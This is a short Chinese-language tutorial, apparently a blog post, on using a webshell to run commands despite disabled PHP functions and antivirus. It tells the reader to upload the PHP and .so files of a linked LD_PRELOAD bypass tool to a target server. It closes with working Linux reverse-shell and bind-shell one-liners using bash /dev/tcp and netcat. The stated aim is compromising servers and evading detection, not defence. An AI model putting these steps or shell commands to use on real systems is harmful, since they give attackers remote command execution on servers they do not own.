webshell入门(二)
webshell绕安全模式执行命令
上一次讲了利用java的runtime.exce()方法执行任意代码,但是必然会受到各种杀毒软件的监控,本次学习一个绕过杀毒软件的webshell
参考网址:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
在上面网址下载下安装包
把上图中的php和so文件上传到目标服务器上去,当我们访问该php页面。可以执行任意代码
根据提示,把参数传入
如上图:即可执行任意代码
ps:linux一行代码反弹webshell
1、 反向向反弹shell:
靶机: bash -i >& /dev/tcp/192.168.0.128/6666 0>&1
攻击机器: nc -lvp 6666
2、正向向反弹shell:
靶机: nc -lvvp 8888 -e /bin/bash
攻击机器: nc 192.168.0.128 8888